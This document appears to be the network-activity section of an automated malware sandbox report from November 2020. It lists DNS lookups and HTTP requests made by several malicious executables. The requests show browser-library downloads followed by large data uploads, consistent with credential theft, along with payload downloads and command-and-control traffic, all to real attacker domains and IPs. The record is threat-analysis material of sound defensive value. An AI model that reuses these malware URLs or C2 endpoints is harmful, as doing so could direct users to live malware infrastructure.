Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: poolventsystems.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 18 Nov 2020 16:06:28 GMT
Content-Type: application/x-msdos-program
Content-Length: 137168
Connection: keep-alive
Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
ETag: "217d0-57aa1f0b0df80"
Expires: Thu, 19 Nov 2020 16:06:28 GMT
Cache-Control: max-age=86400
X-Cache-Status: HIT
Accept-Ranges: bytes
GET

http://poolventsystems.com/msvcp140.dll

D814.exe

Remote address:

199.195.250.165:80

Request

GET /msvcp140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: poolventsystems.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 18 Nov 2020 16:06:28 GMT
Content-Type: application/x-msdos-program
Content-Length: 440120
Connection: keep-alive
Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
ETag: "6b738-57aa1f0b0df80"
Expires: Thu, 19 Nov 2020 16:06:28 GMT
Cache-Control: max-age=86400
X-Cache-Status: HIT
Accept-Ranges: bytes
GET

http://poolventsystems.com/nss3.dll

D814.exe

Remote address:

199.195.250.165:80

Request

GET /nss3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: poolventsystems.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 18 Nov 2020 16:06:28 GMT
Content-Type: application/x-msdos-program
Content-Length: 1246160
Connection: keep-alive
Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
ETag: "1303d0-57aa1f0b0df80"
Expires: Thu, 19 Nov 2020 16:06:28 GMT
Cache-Control: max-age=86400
X-Cache-Status: HIT
Accept-Ranges: bytes
GET

http://poolventsystems.com/softokn3.dll

D814.exe

Remote address:

199.195.250.165:80

Request

GET /softokn3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: poolventsystems.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 18 Nov 2020 16:06:29 GMT
Content-Type: application/x-msdos-program
Content-Length: 144848
Connection: keep-alive
Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
ETag: "235d0-57aa1f0b0df80"
Expires: Thu, 19 Nov 2020 16:06:29 GMT
Cache-Control: max-age=86400
X-Cache-Status: HIT
Accept-Ranges: bytes
GET

http://poolventsystems.com/vcruntime140.dll

D814.exe

Remote address:

199.195.250.165:80

Request

GET /vcruntime140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: poolventsystems.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 18 Nov 2020 16:06:29 GMT
Content-Type: application/x-msdos-program
Content-Length: 83784
Connection: keep-alive
Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
ETag: "14748-57aa1f0b0df80"
Expires: Thu, 19 Nov 2020 16:06:29 GMT
Cache-Control: max-age=86400
X-Cache-Status: HIT
Accept-Ranges: bytes
POST

http://poolventsystems.com/

D814.exe

Remote address:

199.195.250.165:80

Request

POST / HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 50519
Host: poolventsystems.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 18 Nov 2020 16:06:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
DNS

kos-games.com

Remote address:

8.8.8.8:53

Request

kos-games.com

IN A

Response

kos-games.com

IN A

185.178.208.165
DNS

kos-games.com

Remote address:

8.8.8.8:53

Request

kos-games.com

IN A

Response

kos-games.com

IN A

185.178.208.165
DNS

domain2222.com

Remote address:

8.8.8.8:53

Request

domain2222.com

IN A

Response

domain2222.com

IN A

45.153.184.54
POST

http://domain2222.com/cfg/

Remote address:

45.153.184.54:80

Request

POST /cfg/ HTTP/1.1
Content-Type: text/html
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 83.0.85765.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Host: domain2222.com
Content-Length: 41
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Date: Wed, 18 Nov 2020 16:06:29 GMT
Content-Length: 108
POST

http://domain2222.com/log/

Remote address:

45.153.184.54:80

Request

POST /log/ HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 83.0.85765.121 Safari/537.36
Host: domain2222.com
Content-Length: 262146
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Date: Wed, 18 Nov 2020 16:06:30 GMT
Content-Length: 20
POST

http://ip-api.com/line/

Remote address:

208.95.112.1:80

Request

POST /line/ HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: ip-api.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:06:29 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 181
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS

jg5.5aef.pw

Remote address:

8.8.8.8:53

Request

jg5.5aef.pw

IN A

Response

jg5.5aef.pw

IN A

101.99.90.200
DNS

jg5.5aef.pw

Remote address:

8.8.8.8:53

Request

jg5.5aef.pw

IN A

Response

jg5.5aef.pw

IN A

101.99.90.200
GET

http://jg5.5aef.pw/download.php

Remote address:

101.99.90.200:80

Request

GET /download.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: jg5.5aef.pw

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:06:31 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Accept-Ranges: bytes
Accept-Length: 522752
Content-Disposition: attachment; filename=jg5_5aef.exe
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/octet-stream;charset=utf-8
DNS

microsoft.com

Remote address:

8.8.8.8:53

Request

microsoft.com

IN A

Response

microsoft.com

IN A

104.215.148.63

microsoft.com

IN A

40.76.4.15

microsoft.com

IN A

40.112.72.205

microsoft.com

IN A

40.113.200.201

microsoft.com

IN A

13.77.161.179
DNS

microsoft.com

Remote address:

8.8.8.8:53

Request

microsoft.com

IN MX

Response

microsoft.com

IN MX

microsoft-commail protectionoutlook�
DNS

microsoft-com.mail.protection.outlook.com

Remote address:

8.8.8.8:53

Request

microsoft-com.mail.protection.outlook.com

IN A

Response

microsoft-com.mail.protection.outlook.com

IN A

104.47.54.36
DNS

microsoft-com.mail.protection.outlook.com

Remote address:

8.8.8.8:53

Request

microsoft-com.mail.protection.outlook.com

IN A

Response

microsoft-com.mail.protection.outlook.com

IN A

104.47.53.36
DNS

qpao.top

Remote address:

8.8.8.8:53

Request

qpao.top

IN A

Response

qpao.top

IN A

46.173.214.122
DNS

qpao.top

Remote address:

8.8.8.8:53

Request

qpao.top

IN A

Response

qpao.top

IN A

46.173.214.122
GET

http://qpao.top/files/penelop/updatewin1.exe

Remote address:

46.173.214.122:80

Request

GET /files/penelop/updatewin1.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: qpao.top

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:05:58 GMT
Server: Apache/2.4.37 (Win64) PHP/5.6.40
Last-Modified: Thu, 23 Jan 2020 18:09:45 GMT
ETag: "44200-59cd28bc112ac"
Accept-Ranges: bytes
Content-Length: 279040
Connection: close
Content-Type: application/x-msdownload
GET

http://qpao.top/nddddhsspen6/get.php?pid=826ABB12B6018EB139D2574CF3952219&first=true

Remote address:

46.173.214.122:80

Request

GET /nddddhsspen6/get.php?pid=826ABB12B6018EB139D2574CF3952219&first=true HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: qpao.top

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:05:58 GMT
Server: Apache/2.4.37 (Win64) PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 563
Connection: close
Content-Type: text/html; charset=UTF-8
POST

http://86.105.252.12:35200/IRemotePanel

Remote address:

86.105.252.12:35200

Request

POST /IRemotePanel HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings"
Host: 86.105.252.12:35200
Content-Length: 136
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Length: 10120
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 18 Nov 2020 16:06:42 GMT
GET

http://qpao.top/files/penelop/updatewin2.exe

Remote address:

46.173.214.122:80

Request

GET /files/penelop/updatewin2.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: qpao.top

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:05:59 GMT
Server: Apache/2.4.37 (Win64) PHP/5.6.40
Last-Modified: Thu, 23 Jan 2020 18:09:45 GMT
ETag: "44a00-59cd28bc112ac"
Accept-Ranges: bytes
Content-Length: 281088
Connection: close
Content-Type: application/x-msdownload
DNS

api.ip.sb

Remote address:

8.8.8.8:53

Request

api.ip.sb

IN A

Response

api.ip.sb

IN CNAME

api.ip.sb.cdn.cloudflare.net

api.ip.sb.cdn.cloudflare.net

IN A

104.26.12.31

api.ip.sb.cdn.cloudflare.net

IN A

104.26.13.31

api.ip.sb.cdn.cloudflare.net

IN A

172.67.75.172
GET

http://qpao.top/files/penelop/updatewin.exe

Remote address:

46.173.214.122:80

Request

GET /files/penelop/updatewin.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: qpao.top

Response

HTTP/1.1 404 Not Found

Date: Wed, 18 Nov 2020 16:06:00 GMT
Server: Apache/2.4.37 (Win64) PHP/5.6.40
Content-Length: 225
Connection: close
Content-Type: text/html; charset=iso-8859-1
GET

http://qpao.top/files/penelop/3.exe

Remote address:

46.173.214.122:80

Request

GET /files/penelop/3.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: qpao.top

Response

HTTP/1.1 404 Not Found

Date: Wed, 18 Nov 2020 16:06:01 GMT
Server: Apache/2.4.37 (Win64) PHP/5.6.40
Content-Length: 217
Connection: close
Content-Type: text/html; charset=iso-8859-1
DNS

www.microsoft.com

Remote address:

8.8.8.8:53

Request

www.microsoft.com

IN A

Response

www.microsoft.com

IN CNAME

www.microsoft.com-c-3.edgekey.net

www.microsoft.com-c-3.edgekey.net

IN CNAME

www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net

www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net

IN CNAME

e13678.dspb.akamaiedge.net

e13678.dspb.akamaiedge.net

IN A

80.67.94.7
DNS

www.bing.com

Remote address:

8.8.8.8:53

Request

www.bing.com

IN A

Response

www.bing.com

IN CNAME

a-0001.a-afdentry.net.trafficmanager.net

a-0001.a-afdentry.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
DNS

checkip.amazonaws.com

Remote address:

8.8.8.8:53

Request

checkip.amazonaws.com

IN A

Response

checkip.amazonaws.com

IN CNAME

checkip.check-ip.aws.a2z.com

checkip.check-ip.aws.a2z.com

IN CNAME

checkip.us-east-1.prod.check-ip.aws.a2z.com

checkip.us-east-1.prod.check-ip.aws.a2z.com

IN A

52.204.109.97

checkip.us-east-1.prod.check-ip.aws.a2z.com

IN A

34.192.7.28

checkip.us-east-1.prod.check-ip.aws.a2z.com

IN A

34.193.115.2

checkip.us-east-1.prod.check-ip.aws.a2z.com

IN A

52.20.197.7

checkip.us-east-1.prod.check-ip.aws.a2z.com

IN A

18.209.89.50

checkip.us-east-1.prod.check-ip.aws.a2z.com

IN A

18.233.3.145

checkip.us-east-1.prod.check-ip.aws.a2z.com

IN A

23.21.27.29

checkip.us-east-1.prod.check-ip.aws.a2z.com

IN A

3.222.126.94
GET

http://checkip.amazonaws.com/

Remote address:

52.204.109.97:80

Request

GET / HTTP/1.1
Host: checkip.amazonaws.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:06:44 GMT
Server: lighttpd/1.4.53
Content-Length: 13
Connection: keep-alive
GET

http://qpao.top/files/penelop/4.exe

Remote address:

46.173.214.122:80

Request

GET /files/penelop/4.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: qpao.top

Response

HTTP/1.1 404 Not Found

Date: Wed, 18 Nov 2020 16:06:01 GMT
Server: Apache/2.4.37 (Win64) PHP/5.6.40
Content-Length: 217
Connection: close
Content-Type: text/html; charset=iso-8859-1
DNS

whois.iana.org

Remote address:

8.8.8.8:53

Request

whois.iana.org

IN A

Response

whois.iana.org

IN CNAME

ianawhois.vip.icann.org

ianawhois.vip.icann.org

IN A

192.0.32.59
GET

http://qpao.top/files/penelop/5.exe

Remote address:

46.173.214.122:80

Request

GET /files/penelop/5.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: qpao.top

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:06:01 GMT
Server: Apache/2.4.37 (Win64) PHP/5.6.40
Last-Modified: Tue, 17 Nov 2020 11:41:43 GMT
ETag: "9c200-5b44bfa967dd6"
Accept-Ranges: bytes
Content-Length: 639488
Connection: close
Content-Type: application/x-msdownload
DNS

WHOIS.AFRINIC.NET

Remote address:

8.8.8.8:53

Request

WHOIS.AFRINIC.NET

IN A

Response

WHOIS.AFRINIC.NET

IN CNAME

whois-public.AFRINIC.NET

whois-public.AFRINIC.NET

IN A

196.216.2.21

whois-public.AFRINIC.NET

IN A

196.216.2.20

whois-public.AFRINIC.NET

IN A

196.192.115.21

104.18.56.131:443

a.kvaka.li

tls

intro.exe

1.3kB
4.9kB
13
11
104.18.56.131:80

http://kvaka.li/1210776429.php

http

keygen-step-1.exe

583 B
1.1kB
7
6

HTTP Request

POST http://kvaka.li/1210776429.php

HTTP Response

200
88.99.66.31:443

iplogger.org

tls

intro.exe

1.1kB
4.4kB
11
7
194.54.83.254:80

http://ffdownload.online/business/receive

http

002.exe

977 B
383 B
6
5

HTTP Request

POST http://ffdownload.online/business/receive

HTTP Response

200
101.36.107.74:80

http://101.36.107.74/seemorebty/il.php?e=jg2_2qua

http

jg2_2qua.exe

690 B
487 B
6
5

HTTP Request

GET http://101.36.107.74/seemorebty/il.php?e=jg2_2qua

HTTP Response

200
88.99.66.31:443

iplogger.org

tls

jg2_2qua.exe

1.2kB
5.4kB
10
9
172.67.204.197:80

http://8d96c6c8686c52e7.xyz/info/w

http

aliens.exe

2.3kB
2.7kB
11
10

HTTP Request

POST http://8d96c6c8686c52e7.xyz/info/w

HTTP Response

200

HTTP Request

POST http://8d96c6c8686c52e7.xyz/info/w

HTTP Response

200

HTTP Request

POST http://8d96c6c8686c52e7.xyz/info/w

HTTP Response

200
101.36.107.74:80

http://101.36.107.74/seemorebty/poe.php?e=jg2_2qua

http

jg2_2qua.exe

336 B
305 B
5
3

HTTP Request

GET http://101.36.107.74/seemorebty/poe.php?e=jg2_2qua

HTTP Response

200
88.99.66.31:443

iplogger.org

tls

askinstall21.exe

1.0kB
4.4kB
11
7
103.155.92.58:80

http://www.fddnice.pw/

http

askinstall21.exe

422 B
324 B
5
3

HTTP Request

GET http://www.fddnice.pw/

HTTP Response

200
185.104.114.70:80

http://www.zxfc.pw/Home/Index/lkdinl

http

askinstall21.exe

806 B
539 B
5
3

HTTP Request

POST http://www.zxfc.pw/Home/Index/lkdinl

HTTP Response

200
208.95.112.1:80

http://ip-api.com/json/

http

hjjgaa.exe

759 B
671 B
6
4

HTTP Request

GET http://ip-api.com/json/

HTTP Response

200
172.67.204.197:80

http://8d96c6c8686c52e7.xyz/info/du

http

0B44010BDDEFEFD3.exe

7.6kB
8.0kB
27
30

HTTP Request

POST http://8d96c6c8686c52e7.xyz/info/w

HTTP Response

200

HTTP Request

POST http://8d96c6c8686c52e7.xyz/info/e

HTTP Response

200

HTTP Request

POST http://8d96c6c8686c52e7.xyz/info/w

HTTP Response

200

HTTP Request

POST http://8d96c6c8686c52e7.xyz/info/g

HTTP Response

200

HTTP Request

POST http://8d96c6c8686c52e7.xyz/info/w

HTTP Response

200

HTTP Request

GET http://8d96c6c8686c52e7.xyz/info/r

HTTP Response

200

HTTP Request

POST http://8d96c6c8686c52e7.xyz/info/a

HTTP Response

200

HTTP Request

POST http://8d96c6c8686c52e7.xyz/info/w

HTTP Response

200

HTTP Request

POST http://8d96c6c8686c52e7.xyz/info/du

HTTP Response

200
172.67.204.197:80

http://8d96c6c8686c52e7.xyz/info/w

http

0B44010BDDEFEFD3.exe

1.6kB
1.8kB
8
8

HTTP Request

POST http://8d96c6c8686c52e7.xyz/info/w

HTTP Response

200

HTTP Request

POST http://8d96c6c8686c52e7.xyz/info/w

HTTP Response

200
157.240.27.35:443

www.facebook.com

tls

hjjgaa.exe

13.1kB
603.7kB
250
452
104.27.140.60:443

e35654c2a64bf304.club

tls

0B44010BDDEFEFD3.exe

1.5kB
4.0kB
10
9
207.246.80.14:80

http://uehge4g6gh.2ihsfa.com/api/?sid=526772&key=843fbb08ba0d8f2b5e9a3e5c811acc2f

http

hjjgaa.exe

1.2kB
801 B
9
7

HTTP Request

GET http://uehge4g6gh.2ihsfa.com/api/fbtime

HTTP Response

200

HTTP Request

POST http://uehge4g6gh.2ihsfa.com/api/?sid=526772&key=843fbb08ba0d8f2b5e9a3e5c811acc2f

HTTP Response

200
172.67.204.197:80

http://8D96C6C8686C52E7.xyz/info/ddd

http

0B44010BDDEFEFD3.exe

343 B
1.3kB
6
5

HTTP Request

GET http://8D96C6C8686C52E7.xyz/info/ddd

HTTP Response

200
140.206.225.138:80

http://140.206.225.138:80/

http

MiniThunderPlatform.exe

1.8kB
2.4kB
11
6

HTTP Request

POST http://140.206.225.138:80/

HTTP Response

200

HTTP Request

POST http://140.206.225.138:80/

HTTP Response

200
47.97.7.140:80

http://47.97.7.140:80/

http

MiniThunderPlatform.exe

741 B
9.3kB
11
13

HTTP Request

POST http://47.97.7.140:80/

HTTP Response

200
8.208.85.95:80

http://dream.pics/setup_10.2_mix.exe

http

MiniThunderPlatform.exe

12.7kB
732.7kB
270
496

HTTP Request

GET http://dream.pics/setup_10.2_mix.exe

HTTP Response

200
140.206.225.138:80

http://140.206.225.138:80/

http

MiniThunderPlatform.exe

516 B
574 B
5
4

HTTP Request

POST http://140.206.225.138:80/

HTTP Response

200
8.208.85.95:80

http://dream.pics/setup_10.2_mix.exe

http

MiniThunderPlatform.exe

2.0kB
94.1kB
37
67

HTTP Request

GET http://dream.pics/setup_10.2_mix.exe

HTTP Response

206
8.208.85.95:80

http://dream.pics/setup_10.2_mix.exe

http

MiniThunderPlatform.exe

2.0kB
94.1kB
37
67

HTTP Request

GET http://dream.pics/setup_10.2_mix.exe

HTTP Response

206
8.208.85.95:80

http://dream.pics/setup_10.2_mix.exe

http

MiniThunderPlatform.exe

6.0kB
278.3kB
123
190

HTTP Request

GET http://dream.pics/setup_10.2_mix.exe

HTTP Response

206
8.208.85.95:80

http://dream.pics/setup_10.2_mix.exe

http

MiniThunderPlatform.exe

2.0kB
94.1kB
37
67

HTTP Request

GET http://dream.pics/setup_10.2_mix.exe

HTTP Response

206
8.208.85.95:80

http://dream.pics/setup_10.2_mix.exe

http

MiniThunderPlatform.exe

3.8kB
210.4kB
76
144

HTTP Request

GET http://dream.pics/setup_10.2_mix.exe

HTTP Response

206
8.208.85.95:80

http://dream.pics/setup_10.2_mix.exe

http

MiniThunderPlatform.exe

3.5kB
187.7kB
70
129

HTTP Request

GET http://dream.pics/setup_10.2_mix.exe

HTTP Response

206
8.208.85.95:80

http://dream.pics/setup_10.2_mix.exe

http

MiniThunderPlatform.exe

2.0kB
94.1kB
37
67

HTTP Request

GET http://dream.pics/setup_10.2_mix.exe

HTTP Response

206
8.208.85.95:80

http://dream.pics/setup_10.2_mix.exe

http

MiniThunderPlatform.exe

2.0kB
94.1kB
37
67

HTTP Request

GET http://dream.pics/setup_10.2_mix.exe

HTTP Response

206
8.208.85.95:80

http://dream.pics/setup_10.2_mix.exe

http

MiniThunderPlatform.exe

3.6kB
187.7kB
71
130

HTTP Request

GET http://dream.pics/setup_10.2_mix.exe

HTTP Response

206
8.208.85.95:80

http://dream.pics/setup_10.2_mix.exe

http

MiniThunderPlatform.exe

4.2kB
225.5kB
84
157

HTTP Request

GET http://dream.pics/setup_10.2_mix.exe

HTTP Response

206
140.206.225.232:80

http://140.206.225.232:80/

http

MiniThunderPlatform.exe

2.4kB
580 B
11
8

HTTP Request

POST http://140.206.225.232:80/

HTTP Response

200

HTTP Request

POST http://140.206.225.232:80/

HTTP Response

200
47.92.195.246:80

http://47.92.195.246:80/

http

MiniThunderPlatform.exe

493 B
468 B
7
6

HTTP Request

POST http://47.92.195.246:80/

HTTP Response

200
47.92.195.246:80

hub5pr.hz.sandai.net

MiniThunderPlatform.exe

52 B
1
123.125.221.6:80

hub5sr.shub.hz.sandai.net

MiniThunderPlatform.exe

104 B
2
140.206.225.232:80

hubstat.hz.sandai.net

MiniThunderPlatform.exe

150 B
48 B
3
1
140.206.225.136:80

http://140.206.225.136:80/

http

MiniThunderPlatform.exe

734 B
530 B
8
6

HTTP Request

POST http://140.206.225.136:80/

HTTP Response

200
47.92.195.246:80

http://47.92.195.246:80/

http

MiniThunderPlatform.exe

558 B
398 B
7
6

HTTP Request

POST http://47.92.195.246:80/

HTTP Response

200
47.92.195.246:80

hub5pr.hz.sandai.net

MiniThunderPlatform.exe

52 B
1
88.99.66.31:443

iplogger.org

tls

MicrosoftEdgeCP.exe

1.2kB
4.4kB
13
10
88.99.66.31:443

iplogger.org

tls

MicrosoftEdgeCP.exe

944 B
3.9kB
11
9
88.99.66.31:443

iplogger.org

tls

MicrosoftEdge.exe

1.3kB
4.8kB
14
10
88.99.66.31:443

iplogger.org

tls

MicrosoftEdge.exe

934 B
3.9kB
11
9
5.61.35.193:80

http://naritouzina.net/

http

39.1kB
1.7MB
643
1201

HTTP Request

POST http://naritouzina.net/

HTTP Response

404

HTTP Request

POST http://naritouzina.net/

HTTP Response

404

HTTP Request

POST http://naritouzina.net/

HTTP Response

404

HTTP Request

POST http://naritouzina.net/

HTTP Response

404

HTTP Request

POST http://naritouzina.net/

HTTP Response

404

HTTP Request

POST http://naritouzina.net/

HTTP Response

404

HTTP Request

POST http://naritouzina.net/

HTTP Response

404

HTTP Request

POST http://naritouzina.net/

HTTP Response

404

HTTP Request

POST http://naritouzina.net/

HTTP Response

404

HTTP Request

POST http://naritouzina.net/

HTTP Response

404

HTTP Request

POST http://naritouzina.net/

HTTP Response

404

HTTP Request

POST http://naritouzina.net/

HTTP Response

404

HTTP Request

POST http://naritouzina.net/

HTTP Response

404

HTTP Request

POST http://naritouzina.net/

HTTP Response

404

HTTP Request

POST http://naritouzina.net/

HTTP Response

404

HTTP Request

POST http://naritouzina.net/

HTTP Response

404

HTTP Request

POST http://naritouzina.net/

HTTP Response

404
37.48.127.236:80

http://37.48.127.236/2.php

http

3.6kB
191.5kB
73
133

HTTP Request

GET http://37.48.127.236/2.php

HTTP Response

200
194.54.80.66:80

http://wihumanld.com/download/006.exe

http

21.5kB
1.3MB
463
897

HTTP Request

GET http://wihumanld.com/download/006.exe

HTTP Response

200
77.123.139.190:443

api.2ip.ua

tls

D5F0.exe

1.1kB
8.0kB
15
10
194.54.83.254:80

http://ffdownload.online/business/receive

http

EBDD.exe

1.0kB
383 B
6
5

HTTP Request

POST http://ffdownload.online/business/receive

HTTP Response

200
104.192.141.1:443

bitbucket.org

tls

887 B
5.7kB
7
10
52.217.37.52:443

bbuseruploads.s3.amazonaws.com

tls

6.1kB
291.4kB
113
211
199.195.250.165:80

http://poolventsystems.com/

http

D814.exe

134.5kB
2.5MB
1764
1732

HTTP Request

POST http://poolventsystems.com/718

HTTP Response

200

HTTP Request

GET http://poolventsystems.com/freebl3.dll

HTTP Response

200

HTTP Request

GET http://poolventsystems.com/mozglue.dll

HTTP Response

200

HTTP Request

GET http://poolventsystems.com/msvcp140.dll

HTTP Response

200

HTTP Request

GET http://poolventsystems.com/nss3.dll

HTTP Response

200

HTTP Request

GET http://poolventsystems.com/softokn3.dll

HTTP Response

200

HTTP Request

GET http://poolventsystems.com/vcruntime140.dll

HTTP Response

200

HTTP Request

POST http://poolventsystems.com/

HTTP Response

200
185.178.208.165:443

kos-games.com

tls

3.7kB
178.9kB
69
134
45.153.184.54:80

http://domain2222.com/log/

http

270.4kB
2.2kB
187
44

HTTP Request

POST http://domain2222.com/cfg/

HTTP Response

200

HTTP Request

POST http://domain2222.com/log/

HTTP Response

200
208.95.112.1:80

http://ip-api.com/line/

http

709 B
444 B
5
2

HTTP Request

POST http://ip-api.com/line/

HTTP Response

200
101.99.90.200:80

http://jg5.5aef.pw/download.php

http

4.5kB
144.7kB
84
100

HTTP Request

GET http://jg5.5aef.pw/download.php

HTTP Response

200
104.215.148.63:80

microsoft.com

190 B
92 B
4
2
104.47.54.36:25

microsoft-com.mail.protection.outlook.com

smtp

236 B
289 B
5
4
204.79.197.200:443

ieonline.microsoft.com

tls

8.7kB
188.5kB
162
160
204.79.197.200:443

ieonline.microsoft.com

tls

1.1kB
7.9kB
14
13
43.231.4.7:443

https

401 B
582 B
6
6
77.123.139.190:443

api.2ip.ua

tls

1.0kB
8.0kB
14
11
46.173.214.122:80

http://qpao.top/files/penelop/updatewin1.exe

http

9.6kB
287.7kB
198
197

HTTP Request

GET http://qpao.top/files/penelop/updatewin1.exe

HTTP Response

200
46.173.214.122:80

http://qpao.top/nddddhsspen6/get.php?pid=826ABB12B6018EB139D2574CF3952219&first=true

http

373 B
939 B
5
4

HTTP Request

GET http://qpao.top/nddddhsspen6/get.php?pid=826ABB12B6018EB139D2574CF3952219&first=true

HTTP Response

200
86.105.252.12:35200

http://86.105.252.12:35200/IRemotePanel

http

753 B
10.7kB
8
10

HTTP Request

POST http://86.105.252.12:35200/IRemotePanel

HTTP Response

200
46.173.214.122:80

http://qpao.top/files/penelop/updatewin2.exe

http

9.2kB
289.3kB
198
197

HTTP Request

GET http://qpao.top/files/penelop/updatewin2.exe

HTTP Response

200
104.26.12.31:443

api.ip.sb

tls

707 B
4.3kB
8
8
46.173.214.122:80

http://qpao.top/files/penelop/updatewin.exe

http

378 B
627 B
6
5

HTTP Request

GET http://qpao.top/files/penelop/updatewin.exe

HTTP Response

404
46.173.214.122:80

http://qpao.top/files/penelop/3.exe

http

370 B
619 B
6
5

HTTP Request

GET http://qpao.top/files/penelop/3.exe

HTTP Response

404
204.79.197.200:443

www.bing.com

tls

16.7kB
486.9kB
344
342
204.79.197.200:443

www.bing.com

tls

1.3kB
7.9kB
14
13
52.204.109.97:80

http://checkip.amazonaws.com/

http

255 B
262 B
4
3

HTTP Request

GET http://checkip.amazonaws.com/

HTTP Response

200
46.173.214.122:80

http://qpao.top/files/penelop/4.exe

http

324 B
579 B
5
4

HTTP Request

GET http://qpao.top/files/penelop/4.exe

HTTP Response

404
192.0.32.59:43

whois.iana.org

198 B
492 B
4
4
